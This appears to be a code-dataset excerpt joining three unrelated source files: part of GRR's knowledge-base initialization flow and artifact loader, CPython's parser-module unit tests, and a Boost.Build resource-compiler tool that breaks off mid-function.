raise artifact_lib.KnowledgeBaseUninitializedError(
"Attempting to retreive uninitialized KnowledgeBase for %s. Failing." %
client_obj.urn)
if not kb:
kb = client_schema.KNOWLEDGE_BASE()
SetCoreGRRKnowledgeBaseValues(kb, client_obj)
if kb.os == "Windows":
# Add fallback values.
if not kb.environ_allusersappdata and kb.environ_allusersprofile:
# Guess if we don't have it already.
if kb.os_major_version >= 6:
kb.environ_allusersappdata = u"c:\\programdata"
kb.environ_allusersprofile = u"c:\\programdata"
else:
kb.environ_allusersappdata = (u"c:\\documents and settings\\All Users\\"
"Application Data")
kb.environ_allusersprofile = u"c:\\documents and settings\\All Users"
return kb
def SetCoreGRRKnowledgeBaseValues(kb, client_obj):
"""Set core values from GRR into the knowledgebase."""
client_schema = client_obj.Schema
kb.hostname = utils.SmartUnicode(client_obj.Get(client_schema.FQDN, ""))
if not kb.hostname:
kb.hostname = utils.SmartUnicode(client_obj.Get(client_schema.HOSTNAME, ""))
versions = client_obj.Get(client_schema.OS_VERSION)
if versions and versions.versions:
kb.os_major_version = versions.versions[0]
kb.os_minor_version = versions.versions[1]
client_os = client_obj.Get(client_schema.SYSTEM)
if client_os:
kb.os = utils.SmartUnicode(client_obj.Get(client_schema.SYSTEM))
class KnowledgeBaseInitializationFlow(flow.GRRFlow):
"""Flow that atttempts to initialize the knowledge base.
This flow processes all artifacts specified by the Artifacts.knowledge_base
config. We search for dependent artifacts following the dependency tree
specified by the "provides" attributes in the artifact definitions.
  We don't try to fulfill dependencies in tree order; the reasoning is that
  some artifacts may fail, and some artifacts provide the same dependency.
  Instead we take an iterative approach and keep requesting artifacts until
  all dependencies have been met (a simplified sketch of this loop follows the
  class below). If there is more than one artifact that
provides a dependency we will collect them all as they likely have
different performance characteristics, e.g. accuracy and client impact.
"""
category = "/Collectors/"
behaviours = flow.GRRFlow.behaviours + "ADVANCED"
@flow.StateHandler(next_state="ProcessBootstrap")
def Start(self):
"""For each artifact, create subflows for each collector."""
self.client = aff4.FACTORY.Open(self.client_id, token=self.token)
kb = rdfvalue.KnowledgeBase()
SetCoreGRRKnowledgeBaseValues(kb, self.client)
if not kb.os:
raise flow.FlowError("Client OS not set for: %s, cannot initialize"
" KnowledgeBase" % self.client_id)
self.state.Register("knowledge_base", kb)
self.state.Register("fulfilled_deps", [])
self.state.Register("partial_fulfilled_deps", set())
self.state.Register("all_deps", set())
self.state.Register("in_flight_artifacts", [])
self.state.Register("awaiting_deps_artifacts", [])
self.state.Register("completed_artifacts", [])
self.CallFlow("BootStrapKnowledgeBaseFlow", next_state="ProcessBootstrap")
def _GetDependencies(self):
bootstrap_artifact_names = artifact_lib.ArtifactRegistry.GetArtifactNames(
os_name=self.state.knowledge_base.os, collector_action="Bootstrap")
kb_base_set = set(config_lib.CONFIG["Artifacts.knowledge_base"])
kb_add = set(config_lib.CONFIG["Artifacts.knowledge_base_additions"])
kb_skip = set(config_lib.CONFIG["Artifacts.knowledge_base_skip"])
kb_set = kb_base_set.union(kb_add) - kb_skip
# Ignore bootstrap dependencies since they have already been fulfilled.
no_deps_names = artifact_lib.ArtifactRegistry.GetArtifactNames(
os_name=self.state.knowledge_base.os,
name_list=kb_set,
exclude_dependents=True) - bootstrap_artifact_names
name_deps, all_deps = artifact_lib.ArtifactRegistry.SearchDependencies(
self.state.knowledge_base.os, kb_set)
# We only retrieve artifacts that are explicitly listed in
# Artifacts.knowledge_base + additions - skip.
name_deps = name_deps.intersection(kb_set)
self.state.all_deps = all_deps
# Ignore bootstrap dependencies since they have already been fulfilled.
awaiting_deps_artifacts = list(name_deps - no_deps_names
- bootstrap_artifact_names)
return no_deps_names, all_deps, awaiting_deps_artifacts
@flow.StateHandler(next_state="ProcessBase")
def ProcessBootstrap(self, responses):
"""Process the bootstrap responses."""
if not responses.success:
raise flow.FlowError("Failed to run BootStrapKnowledgeBaseFlow. %s" %
responses.status)
# Store bootstrap responses
if responses.First():
for key, value in responses.First().ToDict().items():
self.state.fulfilled_deps.append(key)
self.state.knowledge_base.Set(key, value)
(no_deps_names, self.state.all_deps,
self.state.awaiting_deps_artifacts) = self._GetDependencies()
# Schedule anything with no deps next
# Send each artifact independently so we can track which artifact produced
# it when it comes back.
# TODO(user): tag SendReplys with the flow that generated them.
for artifact_name in no_deps_names:
self.state.in_flight_artifacts.append(artifact_name)
self.CallFlow("ArtifactCollectorFlow", artifact_list=[artifact_name],
knowledge_base=self.state.knowledge_base,
store_results_in_aff4=False, next_state="ProcessBase",
request_data={"artifact_name": artifact_name})
def _ScheduleCollection(self):
# Schedule any new artifacts for which we have now fulfilled dependencies.
for artifact_name in self.state.awaiting_deps_artifacts:
artifact_obj = artifact_lib.ArtifactRegistry.artifacts[artifact_name]
deps = artifact_obj.GetArtifactPathDependencies()
if set(deps).issubset(self.state.fulfilled_deps):
self.state.in_flight_artifacts.append(artifact_name)
self.state.awaiting_deps_artifacts.remove(artifact_name)
self.CallFlow("ArtifactCollectorFlow", artifact_list=[artifact_name],
store_results_in_aff4=False, next_state="ProcessBase",
request_data={"artifact_name": artifact_name},
knowledge_base=self.state.knowledge_base)
# If we're not done but not collecting anything, start accepting the partial
# dependencies as full, and see if we can complete.
if (self.state.awaiting_deps_artifacts and
not self.state.in_flight_artifacts):
if self.state.partial_fulfilled_deps:
partial = self.state.partial_fulfilled_deps.pop()
self.Log("Accepting partially fulfilled dependency: %s", partial)
self.state.fulfilled_deps.append(partial)
self._ScheduleCollection()
@flow.StateHandler(next_state="ProcessBase")
def ProcessBase(self, responses):
"""Process any retrieved artifacts."""
artifact_name = responses.request_data["artifact_name"]
self.state.in_flight_artifacts.remove(artifact_name)
self.state.completed_artifacts.append(artifact_name)
if not responses.success:
self.Log("Failed to get artifact %s. Status: %s", artifact_name,
responses.status)
else:
deps = self.SetKBValue(responses.request_data["artifact_name"],
responses)
if deps:
# If we fulfilled a dependency, make sure we have collected all
# artifacts that provide the dependency before marking it as fulfilled.
for dep in deps:
required_artifacts = artifact_lib.ArtifactRegistry.GetArtifactNames(
os_name=self.state.knowledge_base.os, provides=[dep])
if required_artifacts.issubset(self.state.completed_artifacts):
self.state.fulfilled_deps.append(dep)
else:
self.state.partial_fulfilled_deps.add(dep)
else:
self.Log("Failed to get artifact %s. Artifact failed to return value.",
artifact_name)
if self.state.awaiting_deps_artifacts:
# Schedule any new artifacts for which we have now fulfilled dependencies.
self._ScheduleCollection()
# If we fail to fulfil deps for things we're supposed to collect, raise
# an error.
if (self.state.awaiting_deps_artifacts and
not self.state.in_flight_artifacts):
missing_deps = list(self.state.all_deps.difference(
self.state.fulfilled_deps))
raise flow.FlowError("KnowledgeBase initialization failed as the "
"following artifacts had dependencies that could "
"not be fulfilled %s. Missing: %s" %
(self.state.awaiting_deps_artifacts, missing_deps))
def SetKBValue(self, artifact_name, responses):
"""Set values in the knowledge base based on responses."""
artifact_obj = artifact_lib.ArtifactRegistry.artifacts[artifact_name]
if not responses:
return None
provided = set() # Track which deps have been provided.
for response in responses:
if isinstance(response, rdfvalue.KnowledgeBaseUser):
# MergeOrAddUser will update or add a user based on the attributes
# returned by the artifact in the KnowledgeBaseUser.
attrs_provided, merge_conflicts = (
self.state.knowledge_base.MergeOrAddUser(response))
provided.update(attrs_provided)
for key, old_val, val in merge_conflicts:
self.Log("KnowledgeBaseUser merge conflict in %s. Old value: %s, "
"Newly written value: %s", key, old_val, val)
elif len(artifact_obj.provides) == 1:
# This artifact provides a single KB attribute.
value = None
provides = artifact_obj.provides[0]
if isinstance(response, rdfvalue.RDFString):
value = str(responses.First())
elif artifact_obj.collectors[0].action == "GetRegistryValue":
value = responses.First().registry_data.GetValue()
if value:
logging.debug("Set KB %s to %s", provides, value)
self.state.knowledge_base.Set(provides, value)
provided.add(provides)
else:
logging.debug("Empty KB return value for %s", provides)
else:
# We are setting a knowledgebase value for something with multiple
# provides. This isn't currently supported.
raise RuntimeError("Attempt to process broken knowledge base artifact")
return provided
def CopyUsersFromKnowledgeBase(self, client):
"""Copy users from knowledgebase to USER.
TODO(user): deprecate USER completely in favour of KNOWLEDGE_BASE.user
Args:
client: client object open for writing
"""
usernames = []
user_list = client.Schema.USER()
for kbuser in self.state.knowledge_base.users:
user_list.Append(rdfvalue.User().FromKnowledgeBaseUser(kbuser))
if kbuser.username:
usernames.append(kbuser.username)
# Store it now
client.AddAttribute(client.Schema.USER, user_list)
client.AddAttribute(client.Schema.USERNAMES(
" ".join(usernames)))
@flow.StateHandler()
def End(self, unused_responses):
"""Finish up and write the results."""
client = aff4.FACTORY.Open(self.client_id, mode="rw", token=self.token)
client.Set(client.Schema.KNOWLEDGE_BASE, self.state.knowledge_base)
self.CopyUsersFromKnowledgeBase(client)
client.Flush()
self.Notify("ViewObject", client.urn, "Knowledge Base Updated.")
self.SendReply(self.state.knowledge_base)
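# --- Illustrative sketch (added example, not part of the original module) ---
# A simplified, GRR-independent illustration of the iterative strategy the
# KnowledgeBaseInitializationFlow docstring describes: instead of walking the
# dependency tree in order, repeatedly schedule every artifact whose
# dependencies are currently fulfilled until nothing is left (or no progress
# can be made). The artifact names and dependencies below are hypothetical.
def _example_resolve(artifacts):
  """artifacts: dict of name -> (set of required deps, set of provided deps)."""
  fulfilled = set()
  pending = set(artifacts)
  while pending:
    ready = [name for name in pending
             if artifacts[name][0].issubset(fulfilled)]
    if not ready:
      raise RuntimeError("unresolvable dependencies: %s" % sorted(pending))
    for name in ready:
      pending.remove(name)
      # "Collecting" an artifact fulfills whatever it provides.
      fulfilled.update(artifacts[name][1])
  return fulfilled

# _example_resolve({
#     "OSRelease": (set(), {"os"}),
#     "UserHomeDirs": ({"os"}, {"users.homedir"}),
# })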
def UploadArtifactYamlFile(file_content, base_urn=None, token=None,
overwrite=True):
"""Upload a yaml or json file as an artifact to the datastore."""
_ = overwrite
if not base_urn:
base_urn = aff4.ROOT_URN.Add("artifact_store")
with aff4.FACTORY.Create(base_urn, aff4_type="RDFValueCollection",
token=token, mode="rw") as artifact_coll:
# Iterate through each artifact adding it to the collection.
for artifact_value in artifact_lib.ArtifactsFromYaml(file_content):
artifact_coll.Add(artifact_value)
logging.info("Uploaded artifact %s to %s", artifact_value.name, base_urn)
return base_urn
def LoadArtifactsFromDatastore(artifact_coll_urn=None, token=None,
overwrite_if_exists=True):
"""Load artifacts from the data store."""
loaded_artifacts = []
if not artifact_coll_urn:
artifact_coll_urn = aff4.ROOT_URN.Add("artifact_store")
with aff4.FACTORY.Create(artifact_coll_urn, aff4_type="RDFValueCollection",
token=token, mode="rw") as artifact_coll:
for artifact_value in artifact_coll:
artifact_lib.ArtifactRegistry.RegisterArtifact(
artifact_value, source="datastore:%s" % artifact_coll_urn,
overwrite_if_exists=overwrite_if_exists)
loaded_artifacts.append(artifact_value)
logging.debug("Loaded artifact %s from %s", artifact_value.name,
artifact_coll_urn)
  # Once all artifacts are loaded we can validate, as validating dependencies
  # requires that the whole group is loaded first.
for artifact_value in loaded_artifacts:
artifact_value.Validate()
class GRRArtifactMappings(object):
"""SemanticProto to AFF4 storage mappings.
Class defining mappings between RDFValues collected by Artifacts, and the
location they are stored in the AFF4 hierarchy.
Each entry in the map contains:
1. Location stored relative to the client.
2. Name of the AFF4 type.
3. Name of the attribute to be changed.
4. Method for adding the RDFValue to the Attribute (Set, Append)
"""
rdf_map = {
"SoftwarePackage": ("info/software", "InstalledSoftwarePackages",
"INSTALLED_PACKAGES", "Append")
}
class ArtifactLoader(registry.InitHook):
"""Loads artifacts from the datastore and from the filesystem.
Datastore gets loaded second so it can override Artifacts in the files.
"""
pre = ["AFF4InitHook"]
def RunOnce(self):
for path in config_lib.CONFIG["Artifacts.artifact_dirs"]:
artifact_lib.LoadArtifactsFromDir(path)
|
apache-2.0
|
adaussy/eclipse-monkey-revival
|
plugins/python/org.eclipse.eclipsemonkey.lang.python/Lib/test/test_parser.py
|
38
|
20214
|
import parser
import unittest
import sys
from test import test_support
#
# First, we test that we can generate trees from valid source fragments,
# and that these valid trees are indeed allowed by the tree-loading side
# of the parser module.
#
class RoundtripLegalSyntaxTestCase(unittest.TestCase):
def roundtrip(self, f, s):
st1 = f(s)
t = st1.totuple()
try:
st2 = parser.sequence2st(t)
except parser.ParserError, why:
self.fail("could not roundtrip %r: %s" % (s, why))
self.assertEqual(t, st2.totuple(),
"could not re-generate syntax tree")
def check_expr(self, s):
self.roundtrip(parser.expr, s)
def test_flags_passed(self):
        # The unicode_literals flag has to be passed from the parser to AST
# generation.
suite = parser.suite("from __future__ import unicode_literals; x = ''")
code = suite.compile()
scope = {}
exec code in scope
self.assertIsInstance(scope["x"], unicode)
def check_suite(self, s):
self.roundtrip(parser.suite, s)
def test_yield_statement(self):
self.check_suite("def f(): yield 1")
self.check_suite("def f(): yield")
self.check_suite("def f(): x += yield")
self.check_suite("def f(): x = yield 1")
self.check_suite("def f(): x = y = yield 1")
self.check_suite("def f(): x = yield")
self.check_suite("def f(): x = y = yield")
self.check_suite("def f(): 1 + (yield)*2")
self.check_suite("def f(): (yield 1)*2")
self.check_suite("def f(): return; yield 1")
self.check_suite("def f(): yield 1; return")
self.check_suite("def f():\n"
" for x in range(30):\n"
" yield x\n")
self.check_suite("def f():\n"
" if (yield):\n"
" yield x\n")
def test_expressions(self):
self.check_expr("foo(1)")
self.check_expr("{1:1}")
self.check_expr("{1:1, 2:2, 3:3}")
self.check_expr("{1:1, 2:2, 3:3,}")
self.check_expr("{1}")
self.check_expr("{1, 2, 3}")
self.check_expr("{1, 2, 3,}")
self.check_expr("[]")
self.check_expr("[1]")
self.check_expr("[1, 2, 3]")
self.check_expr("[1, 2, 3,]")
self.check_expr("()")
self.check_expr("(1,)")
self.check_expr("(1, 2, 3)")
self.check_expr("(1, 2, 3,)")
self.check_expr("[x**3 for x in range(20)]")
self.check_expr("[x**3 for x in range(20) if x % 3]")
self.check_expr("[x**3 for x in range(20) if x % 2 if x % 3]")
self.check_expr("[x+y for x in range(30) for y in range(20) if x % 2 if y % 3]")
#self.check_expr("[x for x in lambda: True, lambda: False if x()]")
self.check_expr("list(x**3 for x in range(20))")
self.check_expr("list(x**3 for x in range(20) if x % 3)")
self.check_expr("list(x**3 for x in range(20) if x % 2 if x % 3)")
self.check_expr("list(x+y for x in range(30) for y in range(20) if x % 2 if y % 3)")
self.check_expr("{x**3 for x in range(30)}")
self.check_expr("{x**3 for x in range(30) if x % 3}")
self.check_expr("{x**3 for x in range(30) if x % 2 if x % 3}")
self.check_expr("{x+y for x in range(30) for y in range(20) if x % 2 if y % 3}")
self.check_expr("{x**3: y**2 for x, y in zip(range(30), range(30))}")
self.check_expr("{x**3: y**2 for x, y in zip(range(30), range(30)) if x % 3}")
self.check_expr("{x**3: y**2 for x, y in zip(range(30), range(30)) if x % 3 if y % 3}")
self.check_expr("{x:y for x in range(30) for y in range(20) if x % 2 if y % 3}")
self.check_expr("foo(*args)")
self.check_expr("foo(*args, **kw)")
self.check_expr("foo(**kw)")
self.check_expr("foo(key=value)")
self.check_expr("foo(key=value, *args)")
self.check_expr("foo(key=value, *args, **kw)")
self.check_expr("foo(key=value, **kw)")
self.check_expr("foo(a, b, c, *args)")
self.check_expr("foo(a, b, c, *args, **kw)")
self.check_expr("foo(a, b, c, **kw)")
self.check_expr("foo(a, *args, keyword=23)")
self.check_expr("foo + bar")
self.check_expr("foo - bar")
self.check_expr("foo * bar")
self.check_expr("foo / bar")
self.check_expr("foo // bar")
self.check_expr("lambda: 0")
self.check_expr("lambda x: 0")
self.check_expr("lambda *y: 0")
self.check_expr("lambda *y, **z: 0")
self.check_expr("lambda **z: 0")
self.check_expr("lambda x, y: 0")
self.check_expr("lambda foo=bar: 0")
self.check_expr("lambda foo=bar, spaz=nifty+spit: 0")
self.check_expr("lambda foo=bar, **z: 0")
self.check_expr("lambda foo=bar, blaz=blat+2, **z: 0")
self.check_expr("lambda foo=bar, blaz=blat+2, *y, **z: 0")
self.check_expr("lambda x, *y, **z: 0")
self.check_expr("lambda x: 5 if x else 2")
self.check_expr("(x for x in range(10))")
self.check_expr("foo(x for x in range(10))")
def test_print(self):
self.check_suite("print")
self.check_suite("print 1")
self.check_suite("print 1,")
self.check_suite("print >>fp")
self.check_suite("print >>fp, 1")
self.check_suite("print >>fp, 1,")
def test_simple_expression(self):
# expr_stmt
self.check_suite("a")
def test_simple_assignments(self):
self.check_suite("a = b")
self.check_suite("a = b = c = d = e")
def test_simple_augmented_assignments(self):
self.check_suite("a += b")
self.check_suite("a -= b")
self.check_suite("a *= b")
self.check_suite("a /= b")
self.check_suite("a //= b")
self.check_suite("a %= b")
self.check_suite("a &= b")
self.check_suite("a |= b")
self.check_suite("a ^= b")
self.check_suite("a <<= b")
self.check_suite("a >>= b")
self.check_suite("a **= b")
def test_function_defs(self):
self.check_suite("def f(): pass")
self.check_suite("def f(*args): pass")
self.check_suite("def f(*args, **kw): pass")
self.check_suite("def f(**kw): pass")
self.check_suite("def f(foo=bar): pass")
self.check_suite("def f(foo=bar, *args): pass")
self.check_suite("def f(foo=bar, *args, **kw): pass")
self.check_suite("def f(foo=bar, **kw): pass")
self.check_suite("def f(a, b): pass")
self.check_suite("def f(a, b, *args): pass")
self.check_suite("def f(a, b, *args, **kw): pass")
self.check_suite("def f(a, b, **kw): pass")
self.check_suite("def f(a, b, foo=bar): pass")
self.check_suite("def f(a, b, foo=bar, *args): pass")
self.check_suite("def f(a, b, foo=bar, *args, **kw): pass")
self.check_suite("def f(a, b, foo=bar, **kw): pass")
self.check_suite("@staticmethod\n"
"def f(): pass")
self.check_suite("@staticmethod\n"
"@funcattrs(x, y)\n"
"def f(): pass")
self.check_suite("@funcattrs()\n"
"def f(): pass")
def test_class_defs(self):
self.check_suite("class foo():pass")
self.check_suite("@class_decorator\n"
"class foo():pass")
self.check_suite("@class_decorator(arg)\n"
"class foo():pass")
self.check_suite("@decorator1\n"
"@decorator2\n"
"class foo():pass")
def test_import_from_statement(self):
self.check_suite("from sys.path import *")
self.check_suite("from sys.path import dirname")
self.check_suite("from sys.path import (dirname)")
self.check_suite("from sys.path import (dirname,)")
self.check_suite("from sys.path import dirname as my_dirname")
self.check_suite("from sys.path import (dirname as my_dirname)")
self.check_suite("from sys.path import (dirname as my_dirname,)")
self.check_suite("from sys.path import dirname, basename")
self.check_suite("from sys.path import (dirname, basename)")
self.check_suite("from sys.path import (dirname, basename,)")
self.check_suite(
"from sys.path import dirname as my_dirname, basename")
self.check_suite(
"from sys.path import (dirname as my_dirname, basename)")
self.check_suite(
"from sys.path import (dirname as my_dirname, basename,)")
self.check_suite(
"from sys.path import dirname, basename as my_basename")
self.check_suite(
"from sys.path import (dirname, basename as my_basename)")
self.check_suite(
"from sys.path import (dirname, basename as my_basename,)")
self.check_suite("from .bogus import x")
def test_basic_import_statement(self):
self.check_suite("import sys")
self.check_suite("import sys as system")
self.check_suite("import sys, math")
self.check_suite("import sys as system, math")
self.check_suite("import sys, math as my_math")
def test_relative_imports(self):
self.check_suite("from . import name")
self.check_suite("from .. import name")
self.check_suite("from .pkg import name")
self.check_suite("from ..pkg import name")
def test_pep263(self):
self.check_suite("# -*- coding: iso-8859-1 -*-\n"
"pass\n")
def test_assert(self):
self.check_suite("assert alo < ahi and blo < bhi\n")
def test_with(self):
self.check_suite("with open('x'): pass\n")
self.check_suite("with open('x') as f: pass\n")
self.check_suite("with open('x') as f, open('y') as g: pass\n")
def test_try_stmt(self):
self.check_suite("try: pass\nexcept: pass\n")
self.check_suite("try: pass\nfinally: pass\n")
self.check_suite("try: pass\nexcept A: pass\nfinally: pass\n")
self.check_suite("try: pass\nexcept A: pass\nexcept: pass\n"
"finally: pass\n")
self.check_suite("try: pass\nexcept: pass\nelse: pass\n")
self.check_suite("try: pass\nexcept: pass\nelse: pass\n"
"finally: pass\n")
def test_except_clause(self):
self.check_suite("try: pass\nexcept: pass\n")
self.check_suite("try: pass\nexcept A: pass\n")
self.check_suite("try: pass\nexcept A, e: pass\n")
self.check_suite("try: pass\nexcept A as e: pass\n")
def test_position(self):
# An absolutely minimal test of position information. Better
# tests would be a big project.
code = "def f(x):\n return x + 1"
st1 = parser.suite(code)
st2 = st1.totuple(line_info=1, col_info=1)
def walk(tree):
node_type = tree[0]
next = tree[1]
if isinstance(next, tuple):
for elt in tree[1:]:
for x in walk(elt):
yield x
else:
yield tree
terminals = list(walk(st2))
self.assertEqual([
(1, 'def', 1, 0),
(1, 'f', 1, 4),
(7, '(', 1, 5),
(1, 'x', 1, 6),
(8, ')', 1, 7),
(11, ':', 1, 8),
(4, '', 1, 9),
(5, '', 2, -1),
(1, 'return', 2, 4),
(1, 'x', 2, 11),
(14, '+', 2, 13),
(2, '1', 2, 15),
(4, '', 2, 16),
(6, '', 2, -1),
(4, '', 2, -1),
(0, '', 2, -1)],
terminals)
#
# Second, we take *invalid* trees and make sure we get ParserError
# rejections for them.
#
class IllegalSyntaxTestCase(unittest.TestCase):
def check_bad_tree(self, tree, label):
try:
parser.sequence2st(tree)
except parser.ParserError:
pass
else:
self.fail("did not detect invalid tree for %r" % label)
def test_junk(self):
# not even remotely valid:
self.check_bad_tree((1, 2, 3), "<junk>")
def test_illegal_yield_1(self):
# Illegal yield statement: def f(): return 1; yield 1
tree = \
(257,
(264,
(285,
(259,
(1, 'def'),
(1, 'f'),
(260, (7, '('), (8, ')')),
(11, ':'),
(291,
(4, ''),
(5, ''),
(264,
(265,
(266,
(272,
(275,
(1, 'return'),
(313,
(292,
(293,
(294,
(295,
(297,
(298,
(299,
(300,
(301,
(302, (303, (304, (305, (2, '1')))))))))))))))))),
(264,
(265,
(266,
(272,
(276,
(1, 'yield'),
(313,
(292,
(293,
(294,
(295,
(297,
(298,
(299,
(300,
(301,
(302,
(303, (304, (305, (2, '1')))))))))))))))))),
(4, ''))),
(6, ''))))),
(4, ''),
(0, ''))))
self.check_bad_tree(tree, "def f():\n return 1\n yield 1")
def test_illegal_yield_2(self):
# Illegal return in generator: def f(): return 1; yield 1
tree = \
(257,
(264,
(265,
(266,
(278,
(1, 'from'),
(281, (1, '__future__')),
(1, 'import'),
(279, (1, 'generators')))),
(4, ''))),
(264,
(285,
(259,
(1, 'def'),
(1, 'f'),
(260, (7, '('), (8, ')')),
(11, ':'),
(291,
(4, ''),
(5, ''),
(264,
(265,
(266,
(272,
(275,
(1, 'return'),
(313,
(292,
(293,
(294,
(295,
(297,
(298,
(299,
(300,
(301,
(302, (303, (304, (305, (2, '1')))))))))))))))))),
(264,
(265,
(266,
(272,
(276,
(1, 'yield'),
(313,
(292,
(293,
(294,
(295,
(297,
(298,
(299,
(300,
(301,
(302,
(303, (304, (305, (2, '1')))))))))))))))))),
(4, ''))),
(6, ''))))),
(4, ''),
(0, ''))))
self.check_bad_tree(tree, "def f():\n return 1\n yield 1")
def test_print_chevron_comma(self):
# Illegal input: print >>fp,
tree = \
(257,
(264,
(265,
(266,
(268,
(1, 'print'),
(35, '>>'),
(290,
(291,
(292,
(293,
(295,
(296,
(297,
(298, (299, (300, (301, (302, (303, (1, 'fp')))))))))))))),
(12, ','))),
(4, ''))),
(0, ''))
self.check_bad_tree(tree, "print >>fp,")
def test_a_comma_comma_c(self):
# Illegal input: a,,c
tree = \
(258,
(311,
(290,
(291,
(292,
(293,
(295,
(296,
(297,
(298, (299, (300, (301, (302, (303, (1, 'a')))))))))))))),
(12, ','),
(12, ','),
(290,
(291,
(292,
(293,
(295,
(296,
(297,
(298, (299, (300, (301, (302, (303, (1, 'c'))))))))))))))),
(4, ''),
(0, ''))
self.check_bad_tree(tree, "a,,c")
def test_illegal_operator(self):
# Illegal input: a $= b
tree = \
(257,
(264,
(265,
(266,
(267,
(312,
(291,
(292,
(293,
(294,
(296,
(297,
(298,
(299,
(300, (301, (302, (303, (304, (1, 'a'))))))))))))))),
(268, (37, '$=')),
(312,
(291,
(292,
(293,
(294,
(296,
(297,
(298,
(299,
(300, (301, (302, (303, (304, (1, 'b'))))))))))))))))),
(4, ''))),
(0, ''))
self.check_bad_tree(tree, "a $= b")
def test_malformed_global(self):
# doesn't have the global keyword in the ast
tree = (257,
(264,
(265,
(266,
(282, (1, 'foo'))), (4, ''))),
(4, ''),
(0, ''))
self.check_bad_tree(tree, "malformed global ast")
def test_missing_import_source(self):
# from import a
tree = \
(257,
(267,
(268,
(269,
(281,
(283, (1, 'from'), (1, 'import'),
(286, (284, (1, 'fred')))))),
(4, ''))),
(4, ''), (0, ''))
self.check_bad_tree(tree, "from import a")
class CompileTestCase(unittest.TestCase):
# These tests are very minimal. :-(
def test_compile_expr(self):
st = parser.expr('2 + 3')
code = parser.compilest(st)
self.assertEqual(eval(code), 5)
def test_compile_suite(self):
st = parser.suite('x = 2; y = x + 3')
code = parser.compilest(st)
globs = {}
exec code in globs
self.assertEqual(globs['y'], 5)
def test_compile_error(self):
st = parser.suite('1 = 3 + 4')
self.assertRaises(SyntaxError, parser.compilest, st)
def test_compile_badunicode(self):
st = parser.suite('a = u"\U12345678"')
self.assertRaises(SyntaxError, parser.compilest, st)
st = parser.suite('a = u"\u1"')
self.assertRaises(SyntaxError, parser.compilest, st)
class ParserStackLimitTestCase(unittest.TestCase):
"""try to push the parser to/over it's limits.
see http://bugs.python.org/issue1881 for a discussion
"""
def _nested_expression(self, level):
return "["*level+"]"*level
def test_deeply_nested_list(self):
e = self._nested_expression(99)
st = parser.expr(e)
st.compile()
def test_trigger_memory_error(self):
e = self._nested_expression(100)
print >>sys.stderr, "Expecting 's_push: parser stack overflow' in next line"
self.assertRaises(MemoryError, parser.expr, e)
def test_main():
test_support.run_unittest(
RoundtripLegalSyntaxTestCase,
IllegalSyntaxTestCase,
CompileTestCase,
ParserStackLimitTestCase,
)
if __name__ == "__main__":
test_main()
|
epl-1.0
|
phra/802_21
|
boost_1_49_0/tools/build/v2/tools/rc.py
|
32
|
7115
|
# Status: being ported by Steven Watanabe
# Base revision: 47077
#
# Copyright (C) Andre Hentz 2003. Permission to copy, use, modify, sell and
# distribute this software is granted provided this copyright notice appears in
# all copies. This software is provided "as is" without express or implied
# warranty, and with no claim as to its suitability for any purpose.
#
# Copyright (c) 2006 Rene Rivera.
#
# Copyright (c) 2008 Steven Watanabe
#
# Use, modification and distribution is subject to the Boost Software
# License Version 1.0. (See accompanying file LICENSE_1_0.txt or
# http://www.boost.org/LICENSE_1_0.txt)
##import type ;
##import generators ;
##import feature ;
##import errors ;
##import scanner ;
##import toolset : flags ;
import bjam
import os
import re
from b2.build import type, toolset, generators, scanner, feature
from b2.tools import builtin
from b2.util import regex
from b2.build.toolset import flags
from b2.manager import get_manager
__debug = None
def debug():
global __debug
if __debug is None:
__debug = "--debug-configuration" in bjam.variable("ARGV")
return __debug
type.register('RC', ['rc'])
def init():
pass
def configure (command = None, condition = None, options = None):
"""
Configures a new resource compilation command specific to a condition,
usually a toolset selection condition. The possible options are:
* <rc-type>(rc|windres) - Indicates the type of options the command
accepts.
Even though the arguments are all optional, only when a command, condition,
and at minimum the rc-type option are given will the command be configured.
This is so that callers don't have to check auto-configuration values
before calling this, while still getting build failures when the
resource compiler can't be found.
"""
rc_type = feature.get_values('<rc-type>', options)
if rc_type:
assert(len(rc_type) == 1)
rc_type = rc_type[0]
if command and condition and rc_type:
flags('rc.compile.resource', '.RC', condition, command)
flags('rc.compile.resource', '.RC_TYPE', condition, rc_type.lower())
flags('rc.compile.resource', 'DEFINES', [], ['<define>'])
flags('rc.compile.resource', 'INCLUDES', [], ['<include>'])
if debug():
print 'notice: using rc compiler ::', condition, '::', command
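# A hypothetical call (the toolset condition and command are purely
# illustrative, not taken from a real configuration):
#   configure('windres', ['<toolset>gcc'], ['<rc-type>windres'])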
engine = get_manager().engine()
class RCAction:
"""Class representing bjam action defined from Python.
The function must register the action to execute."""
def __init__(self, action_name, function):
self.action_name = action_name
self.function = function
def __call__(self, targets, sources, property_set):
if self.function:
self.function(targets, sources, property_set)
# FIXME: What is the proper way to dispatch actions?
def rc_register_action(action_name, function = None):
global engine
if engine.actions.has_key(action_name):
raise "Bjam action %s is already defined" % action_name
engine.actions[action_name] = RCAction(action_name, function)
def rc_compile_resource(targets, sources, properties):
rc_type = bjam.call('get-target-variable', targets, '.RC_TYPE')
global engine
engine.set_update_action('rc.compile.resource.' + rc_type, targets, sources, properties)
rc_register_action('rc.compile.resource', rc_compile_resource)
engine.register_action(
'rc.compile.resource.rc',
'"$(.RC)" -l 0x409 "-U$(UNDEFS)" "-D$(DEFINES)" -I"$(>:D)" -I"$(<:D)" -I"$(INCLUDES)" -fo "$(<)" "$(>)"')
engine.register_action(
'rc.compile.resource.windres',
'"$(.RC)" "-U$(UNDEFS)" "-D$(DEFINES)" -I"$(>:D)" -I"$(<:D)" -I"$(INCLUDES)" -o "$(<)" -i "$(>)"')
# FIXME: this was originally declared quietly
engine.register_action(
'compile.resource.null',
'as /dev/null -o "$(<)"')
# Since it's a common practice to write
# exe hello : hello.cpp hello.rc
# we change the name of the object created from the RC file, to
# avoid a conflict with hello.cpp.
# The reason we generate OBJ and not RES is that gcc does not
# seem to like RES files, but works OK with OBJ.
# See http://article.gmane.org/gmane.comp.lib.boost.build/5643/
#
# Using 'register-c-compiler' adds the build directory to INCLUDES
# FIXME: switch to generators
builtin.register_c_compiler('rc.compile.resource', ['RC'], ['OBJ(%_res)'], [])
__angle_include_re = "#include[ ]*<([^<]+)>"
# Register scanner for resources
class ResScanner(scanner.Scanner):
def __init__(self, includes):
scanner.Scanner.__init__(self)
self.includes = includes
def pattern(self):
return "(([^ ]+[ ]+(BITMAP|CURSOR|FONT|ICON|MESSAGETABLE|RT_MANIFEST)" +\
"[ ]+([^ \"]+|\"[^\"]+\"))|(#include[ ]*(<[^<]+>|\"[^\"]+\")))" ;
def process(self, target, matches, binding):
